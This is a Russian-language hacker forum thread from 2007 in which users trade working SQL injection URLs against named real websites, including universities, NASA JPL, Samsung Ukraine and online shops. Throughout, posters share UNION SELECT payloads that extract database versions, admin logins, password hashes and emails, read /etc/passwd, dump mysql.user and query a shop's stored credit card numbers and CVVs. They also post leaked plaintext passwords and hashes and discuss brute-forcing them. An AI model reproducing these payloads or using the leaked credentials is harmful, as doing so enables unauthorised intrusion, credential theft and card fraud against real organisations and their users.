http://base.gwru.ru/in.php?id=-459+UNION+SELECT+1,2,3,password,email,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+user s+--+
email:mailbox@gwru.ru
password:60bcdf9367b7aada606e446fecc1a47d
Также на сайте полно Xss
Y.Dmitriy
27.08.2007, 20:29
Либеральная партия Украины
http://www.lpu.org.ua/index.php?area=1+union+select+1,2,3,4,5,6/*
2Grey:
прошу прощенья но по поводу баяна не знал... и вообще каковы критерии для обощения данными аргументами... есть где-то ещё?..
4 мускул :( код: http://www.press.try.md/print.php?iddb=Polit&id=-87829+union+select+1,concat(version(),user(),datab ase()),3,4,5,6,7,8/* чет не могу подобрать код: http://press.samsung.ua/news/card.php?id=-212+union+select+1,column_name,3+from+information_ schema.columns/* если боян,то не бейте в репу,а лучше дайте ссылку на антибоян
4 мускул :( код: http://www.press.try.md/print.php?iddb=Polit&id=-87829+union+select+1,concat(version(),user(),datab ase()),3,4,5,6,7,8/* чет не могу подобрать код: http://press.samsung.ua/news/card.php?id=-212+union+select+1,column_name,3+from+information_ schema.columns/* если боян,то не бейте в репу,а лучше дайте ссылку на антибоян
Ты скажи: откуда в 4 мускуле бд information_schema
Ты скажи: откуда в 4 мускуле бд information_schema
в каком 4? Я про самсунг сказал,а там 5 мускул
Nazaret2005
28.08.2007, 01:46
чет не могу подобрать код: http://press.samsung.ua/news/card.php?id=-212+union+select+1,column_name,3+from+information_ schema.columns/* если боян,то не бейте в репу,а лучше дайте ссылку на антибоян
Admins
tim:1
anna:190184
siryks:cthutq
olga:imhappy
marina:SEU
ukraine:12345
kiryuha:magnus80
Visitor
LazMax:210683
Content
ph1:1
Medias
media:1
ss2:ss2
chip:samsung
Karman_in_ua:k-p4ssword
softpress:softpress
little:Rfpbyfrb
pfeffer:cydvb
Есть ещё много
http://press.samsung.ua/news/card.php?id=-1+union+select+1111,role,concat(login,char(58),pas sw)+from+user+where+id=22+limit+0,1/*
меняй id и вытаскивай данные :D
Как посмотреть какие есть таблицы и поля:
http://press.samsung.ua/news/card.php?id=-1+union+select+1,concat(column_name,char(58),table _name),3+from+information_schema.columns+limit+349 ,1/*
меняй limit , он будет показывать какие поля есть в таблице (Поле:Таблица)
nero.com
http://www.nero.com/eng/showpress.php?id=-1+GROUP+BY+13/*
aka PSIH
28.08.2007, 08:36
utsa.edu - PR=7
http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=@@version--
http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=(select%20system_user)
http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=(select%20db_name())
sju.edu - PR=7
http://www.sju.edu/hsb/campbell/research-guides/index-new2.php?subid=-1%20union%20select%201,2,3,4,5,6,7,8,version(),use r(),11,12,13,database(),15,16,17/*
uprm.edu - PR=7
http://www.uprm.edu/library/cre/list_dbs.php?char=1'%20or%201=-1%20union%20select%201,aes_decrypt(aes_encrypt(con cat(user(),0x3a,version(),0x3a,database()),0x71),0 x71),3,4,5,6,7,8,9,10/*
PR8
http://www.aiim.org/standards.asp?id=1+or+1=@@version--
Таблицы:
'vwWebGroups'
vwWebArticleTypes
vwActivePages
vwWebOrderDetails
vwForums
'vwWebModules'
'vwPollResults'
'vwIndustryEventTypes'
'vwForumPosts'
'vwWebUserActivity'
'vwIndustryEvents'
'vwPollQuestions'
'vwWebUsers'
vwChapDisplay
vwWebEntityConfigs
vwWebApplications
vwCompanies
vwChapAllList
vwWebEntityMatchPolicyItems
'vwIndustryEventPollIds'
'vwWebArticles'
vwWebEntityMatchPolicies
vwMarkets
'vwWebProducts'
'vwAIIMChapters
и тд.
но при запросе,
http://www.aiim.org/standards.asp?id=1+or+1=(select+top+1+RequestDoc1+ from+dbo.vwWebUsers)--
и при попытке использовать CMD выдается "The Querystring is invalid"
KPOT_f!nd
28.08.2007, 15:08
http://www.row-people.de/news/news.php?id=-1394+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,29+from+information_schem a.tables/*
_4nob1oz - боян(
Давно не выкладывал :)
http://www.topguard.co.kr/noticeboard/notice_view.php?number=-8+union+select+1,2,3,4,5,6,7,concat_ws(0x3C62722F3 E,USER(),DATABASE(),VERSION()),9,10,11,12,13,14,15 ,16,17/*
Старенькая БД :)
http://www.cleareyes.co.kr/itop20/gasa.php?number=-1+union+select+1,2,3,4,5,6,concat_ws(0x3C62722F3E, USER(),DATABASE(),VERSION()),8,9,10,11,12,13
Constantine
28.08.2007, 15:19
Обновили антибоян, незабываем юзать.
http://filefront.jino-net.ru/sql.html
http://bystrzyca.pl/shows.php?nr=-9+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12 ,13,14,15+from+information_schema.tables+limit+16, 1/*
http://www.tigs-thaiwok.ch/ger.php?nr=-13+union+select+1,table_name,3,4,5,6,7,8,9+from+in formation_schema.tables+limit+16,1/*
http://www.seredina.ru/for.php?id=1&city_id=1+union+select+pwd+from+admins+limit+7,1/*
все правильно подобрал только почему-то не выводит
_-Ramos-_
28.08.2007, 16:24
WWW.SPORT.COM.UA
http://4u.sport.com.ua/players.phtml?country_id=1&player_id=-1+union+select+1,2,3/*
названия таблиц подобрать не смог ((
Texas A & M University Psychology Department Home Page
http://psychology.tamu.edu/Fac_Ext.php?ID=99999999+union+select+1,2,3,4,5,6,7 ,8,9,aes_decrypt(aes_encrypt(concat_ws(0x3a,userna me,password),1),1),11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34+from+admi ns+limit+2,1/*
]
http://psychology.tamu.edu/admin
galexander:narf
2RAUL
http://4u.sport.com.ua/players.phtml?country_id=1&player_id=-1+union+select+1,id,3+from+users/*
http://4u.sport.com.ua/players.phtml?country_id=1&player_id=-1+union+select+1,password,3+from+users/*
ID = 1
PASS = 91c0a0fbe2633617b9400c60ba9e0127
p.s в титле пишет
pps http://4u.sport.com.ua/players.phtml?country_id=1&player_id=-1+union+select+1,name,3+from+players+limit+1,1/*
_http://www.okp.kz/index.php?p=33+union+select+1,concat(login,0x3a,0x 3a,0x3a,pwd,0x3a,0x3a,0x3a,0x3a,email),3,4,5,6,7,8 ,9,10+from+users/*
зацените))
_http://www.innovation.kz/index.php?p=43+union+select+1,2,3,pwd,5,6,7,8,9,10 ,11,12,13+from+users/*
пароли и мыла, логин так и ненашел((
http://www.lifestory.kz/index.php?p=32+union+select+1,concat(login,0x3a,0x 3a,0x3a,0x3a,0x3a,0x3a,pwd,0x3a,0x3a,0x3a,0x3a,0x3 a,0x3a,0x3a,0x3a,email),3,4,5,6,7,8,9,10+from+user s/*
вот еще красивая)
Nazaret2005
28.08.2007, 20:52
_http://www.innovation.kz/index.php?p=43+union+select+1,2,3,pwd,5,6,7,8,9,10 ,11,12,13+from+users/*
пароли и мыла, логин так и ненашел((
Держы,тут подключения идёт через почту ;)
http://www.innovation.kz/index.php?p=43+union+select+1,2,3,id,5,concat(emai l,char(58),pwd),7,8,9,10,11,12,13+from+users/*
Nazaret2005
28.08.2007, 21:55
http://www.upyos.com/?cat=-11+union+select+111,2222,333,444,555,666,777,888,9 99,000,123,456,789,010/*
:)
halkfild
28.08.2007, 23:06
http://www.bt-lady.com.ua/?show_bs=yes&id=-20+union+select+concat_ws(0x3a,version(),database( ),user()),2,3/*
4.0.26-standard:bt-lady:bt-lad
http://www.bt-lady.com.ua/?show_bs=yes&id=-20+union+select+concat_ws(0x3a,username,user_passw ord,user_email),2,3+from+phpbb_users+where+user_le vel=1/*
администратор:32c264cbd961295d
Не могу подобрать колонку юзеров,хотя пароли мыла нашел :) 4 мускул
код:
http://svadba.net.ru/info.php?id=-4077'+union+select+1,2,3,concat(email,pass),5,6,7, 8,9+from+users/*
p.s прошу прощения если боян,так как со смарта юзать антибоян неблагодарное дело :(
http://svadba.net.ru/info.php?id=-4077'+union+select+1,2,3,pass,5,6,7,8,9+from+users/*
Попробуй таблу phpbb_users и колонки в ней username и user_password.
halkfild
28.08.2007, 23:57
http://svadba.net.ru/info.php?id=-4077'+union+select+1,2,3,concat_ws(0x3a,username,u ser_password,user_email),5,6,7,8,9+from+phpbb_user s/*
много мыл и хешей.. :)
ну и теперь достать пассы с самого сайта это все брутануть по списку и все :) /*думаю там процентов 50 сбрутится по списку*/
halkfild
29.08.2007, 00:30
PR - 5
observatorioviolencia.org
http://www.observatorioviolencia.org/documentos.php?id=-123+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11/*
4.1.22-standard-log:originb8_webuser@localhost:originb8_observator ioviolencia
з.ы. все таблици на французком.. интересно в какой таблице юзвери.. /*usager, usagers - не подходят(*/
PR - 5
worldrtd.net
http://www.worldrtd.net/news/world/?id=-666+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,concat_ws(0x3a,version(),user (),database())/*'
4.1.15-Debian_1ubuntu5-log:worldrtd@localhost:worldrtddb
SQL Инъекция проведена Noisia и x.Elf
Сайт: http://mobile.zensis.com/buy.php?pid=-0101'
БД: mYSQL5
Для начала мы нашли базы:
edu
fengshuima
fotogb_forum
fsm_forum
fungshuima
fungshuima_cart.cart_admin
fungshuimablog
match3g
mobolan
mysql
photo_gallery
test
test_table
yahooj2medemo
zabbix
zensis_test
Потом таблицы:
cart_address_book
cart_address_format
cart_admin
cart_admin_activity_log
cart_authorizenet
cart_banners
cart_banners_history
cart_categories
cart_categories_description
cart_configuration
cart_configuration_group
cart_counter
cart_counter_history
cart_countries
cart_coupon_email_track
cart_coupon_gv_customer
cart_coupon_gv_queue
cart_coupon_redeem_track
cart_coupon_restrict
cart_coupons
cart_currencies
cart_customers
cart_customers_basket
cart_customers_basket_attributes
cart_customers_info
cart_customers_wishlist
cart_db_cache
cart_email_archive
cart_featured
cart_files_uploaded
cart_geo_zones
cart_get_terms_to_filter
cart_group_pricing
cart_languages
cart_layout_boxes
cart_manufacturers
cart_manufacturers_info
cart_media_clips
cart_media_manager
cart_media_to_products
cart_media_types
cart_meta_tags_products_description
cart_music_genre
cart_newsletters
cart_orders
cart_orders_products
cart_orders_products_attributes
cart_orders_products_download
cart_orders_status
cart_orders_status_history
cart_orders_total
cart_paypal
cart_paypal_payment_status
cart_paypal_payment_status_history
cart_paypal_session
cart_product_music_extra
cart_product_type_layout
cart_product_types
cart_product_types_to_category
cart_products
cart_products_attributes
cart_products_attributes_download
cart_products_description
cart_products_discount_quantity
cart_products_notifications
cart_products_options_types
cart_products_options_values
cart_products_options_values_to_products_options
cart_products_to_categories
cart_project_version
cart_project_version_history
cart_query_builder
cart_record_artists
cart_record_artists_info
cart_record_company
cart_record_company_info
cart_reviews
cart_reviews_description
cart_salemaker_sales
cart_sessions
cart_specials
cart_tax_rates
cart_template_select
cart_upgrade_exceptions
cart_zones
cart_zones_to_geo_zones
Потом колумны:
birthday
age
grade
placeofbirth
gender
school_info_id
addr1_e
addr2_e
addr3_e
district_s_code
regioncode
student_tel
student_fax
student_email
iq_test
iq_test_date
iq_test_age
iq
fathernamee
fathernamec
fatherphone
fatheroccupation
mothernamee
motherphone
motheroccupation
course_code_1
course_code_2
course_code_3
config_id
type
name
display
value
class
course_info_id
course_code
course_date
name_e
desc_e
desc_c
remark_e
remark_c
districtcode
district_l_e
district_s_id
district_s_c
region_id
region_c
region_e
family_seq
addr_e
addr_c
principal_e
tel
email
user_id
username
password
nickname
adminlevel
blacklist_seq
member_id
heading
blog_seq
remark
content
photopath
status
last_upd_date
family_id
relation
friends_seq
matched_id
score1
score2
scorecombined
dateofbirth
sex
location1
location2
description1
description2
description3
description4
description5
description6
smoking
drinking
vegetarian
height
body
religion
living
night_life
pets_detail
like_pets_detail
maritalstatus
travel_places
education
lived_places
hope_travel_places
job
jobtime
joblocation2
personality1
personality2
personality3
personality4
personality5
personality6
personality7
personality8
personality9
horo
mh_age_s
mh_age_e
mh_sex
mh_location1
mh_location2
mh_location1_weight
mh_body
mh_body_weight
mh_height_s
mh_height_e
mh_height_weight
mh_religion
mobile
operator
Перебираем...
http://www.aboutus.org/ZenSis.com
Смотрим сколько сайтов держит бд...
http://mobile.zensis.com/buy.php?pid=-0101+union+select+concat(username,0x3a,password)+f rom+edu.user+limit+1,1/*
Логин пассы от сайта http://www.fotogb.com/
___
нашли инет магазин
https://store.zarinfabrics.com
Оплата через кредитки, держится все на той же БД
Подобрали базу к таблице.. fungshuima_cart.cart_admin
_____
И делаем такой запрос :))
http://mobile.zensis.com/buy.php?pid=-0101+union+select+column_name+from+information_sch ema.columns+where+table_name='cart_admin'+limit+3, 1/*
теперь
http://mobile.zensis.com/buy.php?pid=-0101+union+select+concat(admin_name,0x21,admin_pas s,0x21,admin_email,0x21,admin_level)+from+fungshui ma_cart.cart_admin/*
___
Подбираем данные, и лезим в кредитки шопа
http://mobile.zensis.com/buy.php?pid=-0101+union+select+concat(cc_type,0x3a,0x3a,cc_owne r,0x3a,0x3a,cc_number,0x3a,0x3a,cc_expires,0x3a,0x 3a,cc_cvv,0x3a,0x3a)+from+fungshuima_cart.cart_ord ers+limit+1,1/*
но в конце большой облом, КРЕДИТКА ВСЕГО ОДНА.
Зато много опыта, и чужая просроченая кредитка:))
Покопался, ничё не нащёл, выбрасывать жалко, может комунить и пригодится :)
_http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,1 3/*
Calcutta
29.08.2007, 06:53
4.0.26-standard:bt-lady:bt-lad
администратор:32c264cbd961295d
в общем не знаю как на реагируют на доработку чужих инъекций (один раз какой то агро попался -)) о.О или тут так принято?)
но все же решил добавить чуть побольше информации...
http://www.bt-lady.com.ua/?show_bs=yes&id=-20+union+select+concat_ws(0x3a,username,user_passw ord,user_email),user(),user_password+from+phpbb_us ers+where+user_level=1/*
администратор:32c264cbd961295d
bt-lady@localhost
32c264cbd961295d38f038b560128362
_____
попробовал зайти на фтп (не загрузилось. в админку тоже не пускает с такими данными)
_____
Michelle:d650735de450759a3a801
bt-lady@localhost
d650735de450759a3a801c4174469d2f
halkfild
29.08.2007, 11:09
этой записи нет в антибояне я листать 300 страниц нет особого желания..
з.ы. к админам, модерам и тд.. давайте сделаем скрипт который позволит каждому добавлять его скулю.. это исключит такие ситуации.. заодно в добавлении сделать проверки есть ли этот скуль и тогда будет такой порядок действий:
1 добавил/проверил в антибоян..
2 запостил на форуме
http://www.webkoleso.ru/index.php?pageId=3&comp=22+union+select+1,2,3,4/*
таблицы неподобрал
Calcutta
29.08.2007, 11:57
http://www.webkoleso.ru/index.php?pageId=3&comp=22+union+select+1,2,3,4/*
таблицы неподобрал
естественно не подберешь -))
колонок то 9 (;
http://www.webkoleso.ru/index.php?pageId=-1+union+select+1,2,3,4,5,6,7,8,9/*
сейчас буду дальше искать... Loading [|||||........]
version() - 4.0.26
database() - udb4037
4.0.26:Uwww4037S@localhost
http://www.webkoleso.ru/index.php?pageId=-1+union+select+1,2,3,concat(version(),char(58),use r()),database(),6,7,8,9/*
Calcutta
29.08.2007, 12:51
Покопался, ничё не нащёл, выбрасывать жалко, может комунить и пригодится :)
_http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,1 3/*
http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,database(),version(),4,5,u ser(),7,8,9,10,11,12,13/
хотел докапаться до базы е-маилов и паролей, не получилось. но походу нада дальше учиться и разбираться... подобрал стандарт.. useless :-\
Вот пара .edu c PR 6
http://www.choices.edu/resources/detail.php?id=-49%20UNION%20SELECT%201,convert(concat_ws(0x3b,ver sion(),user(),database())us
ing%20latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26/*
http://www.hum.utah.edu/display.php?&pageId=-2037%20UNION%20SELECT%201,2,3,4,5,6,7,concat(versi on(),user()),9,10,11/*
Joker-jar
29.08.2007, 14:47
http://anmeldung.iao.fraunhofer.de/veranstaltung.php?id=-1+union+select+1,2,3,4,5,6,7,convert(concat(user,0 x3a,password)+using+latin1),9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49, 50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 +from+mysql.user
еще так можно
http://anmeldung.iao.fraunhofer.de/veranstaltung.php?id=-1+union+select+1,2,3,4,5,6,7,load_file('/etc/passwd'),9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,5 6,57,58,59,60,61,62,63,64,65,66
groundhog
29.08.2007, 15:20
http://www.sitronics.ru/
?cat_id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,VERSION(),DATABASE (),USER()),3,4+--+
Y.Dmitriy
29.08.2007, 15:46
интернет магазин
http://www.kontec.ru/details.php?product_id=-1959+union+select+1,2,3,4,5,6,7,user(),9,version() ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
http://levit.ru/product_info.php?products_id=1734+union+select+1,2/*
http://www.yourstyle.ru/catalog/item.php?i=4475+union+select+1,2,3,4,5,6,7,8,9,10, 11,12/*
groundhog
29.08.2007, 16:07
http://vitesse.ru/
http://vitesse.ru/item.php?g_id=-1+UNION+SELECT+1,2,USER(),DATABASE(),5,VERSION(),7 ,8/*
http://www.jobpages.ru/findrezum.php?a=2&id_rezum=-705+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,mail ,15,16,id_resum,18+from+resum+where+id_resum=705/*
http://www.hardvision.ru/?dir=download&id=2970+union+select+1,2,3,4,5/*
http://1cent.ru/Shops/search_good.php?limit=1&search_descript=yeah%27union+select+1,AES_DECRYPT( AES_ENCRYPT(USER(),0x71),0x71),3,4/*&search_brand=&search_model=&Submit=%C8%F1%EA%E0%F2%FC
http://www.t-turn.com/article.php?sid=-9999999+union+select+1,2,3,user(),5,6,7,8,9+from+a uthors/*
http://www.ruclimat.ru/sts/view.php?id=0+union+select+1,2,3,4,concat(database (),0x20,user(),0x20,version()),6,7,8,9/*
Покопался, ничё не нащёл, выбрасывать жалко, может комунить и пригодится :)
_http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,1 3/*
http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,user(),8,9,10,11 ,12,13/*
Подставляй туда вместо user() - database()
У меня работало
amp.ru
http://www.amp.ru/index.php?page=6+UNION+SELECT+1,TABLE_NAME,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+INFOR MATION_SCHEMA.TABLES+--+
Серенький
29.08.2007, 23:17
Покопался, ничё не нащёл, выбрасывать жалко, может комунить и пригодится :)
_http://www.teamarena.ru/demo/99999999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,1 3/*
названия таблиц довольно тривиальные http://www.teamarena.ru/demo/311+UNION+SELECT+1,2,3,concat_ws(0x3a,user_id,user _login,user_password),5,6,7,8,9,10,11,12,13+from+u ser/* прямого вывода нет
bulbazaur
30.08.2007, 01:42
типо первый мой скуль))
http://www.utdallas.edu/calendar/event.php?id=-1175532750+union+select+1,concat(user(),0x3a,datab ase()),3,4,5,6,7,8,9,10,11,12,13/*
вроде не баян, пока на ачате искал, нашел чето похожее, но решил раскрыть тему, к томуже инъекция в другом скрипте:http://www-robotics.jpl.nasa.gov/news/newsStory.cfm?NewsID=-69%20union%20select%201,2,3,4,5,6,7,8,9,aes_decryp t(aes_encrypt(concat(user,0x3a,password),0x71),0x7 1),11,12,13,14,15%20from%20mysql.user/*
root:*1CB7A709BB1423D94D5F2C14E2E929F17BEBF122
Calcutta
30.08.2007, 06:57
http://www.elephant.ru/index.php?item=3891+union+select+version(),2,datab ase(),user(),5,6,7,8,9,10,11,12,13,14,15,16/*
elephantru@localhost
elephantru
4.1.22-standard-log
дальше не раскопал :-/
СПОРТклуб
http://www.sportclub.ru/news.php?id=-46+UNION+SELECT+1,2,3,concat(login,char(58),passwo rd),concat(user(),char(58),version(),char(58),data base()),6,7,8,9+from+users+--+
После того как я зашел на форум, интерес к сайту пропал...
motofan.ru
http://top.motofan.ru/index.php?act=faq
в поле поиска вставить: '/**/and/**/1=2/**/union/**/select/**/version(),database(),user()/*
Dr.Frank
30.08.2007, 14:27
irkutsk.rfn.ru
http://irkutsk.rfn.ru/rnews.html?id=23639+order+by+11--&cid=7
Дальше не смог... UNION не работает =(
http://www.elephant.ru/index.php?item=3891+union+select+version(),2,datab ase(),user(),5,6,7,8,9,10,11,12,13,14,15,16/*
elephantru@localhost
elephantru
4.1.22-standard-log
дальше не раскопал :-/
http://www.elephant.ru/index.php?item=3891+union+select+1,2,concat(name,0 x3a,login,),4,5,6,7,8,9,10,11,12,13,14,15,16+from+ users/*
информационное агенство :)
4 мускул
код:
http://www.context-ua.com/km/forum1 .php?act=forum add&botn=456&top=-4' +union+ select+ 1 ,2 ,con cat(lo gin,pas s),4 ,5 ,6 +from+users/*
дальше не смог :(
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot